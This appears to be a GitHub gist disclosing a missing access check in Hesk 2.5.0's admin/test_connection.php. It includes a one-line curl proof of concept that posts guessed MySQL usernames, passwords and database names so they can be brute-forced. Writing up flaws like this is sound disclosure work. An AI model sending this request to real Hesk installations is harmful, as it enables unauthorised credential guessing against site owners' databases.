Skip to content

Instantly share code, notes, and snippets.

@cedriczirtacic
Created August 6, 2014 19:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save cedriczirtacic/c32e8e4348b216c8d555 to your computer and use it in GitHub Desktop.
Save cedriczirtacic/c32e8e4348b216c8d555 to your computer and use it in GitHub Desktop.
Hesk 2.5.0 Connection Brute Force
(*) There isn't an access control in the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This can give an attacker the opportunity to perform a dictionary bruteforce attack and check every possible combination of username/password and/or databases without having the need to make a real connection to the MySQL service.
(*) proof-of-concept:
curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed
Where USERNAME, PASSWORD and DATABASE are parameters to bruteforce.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment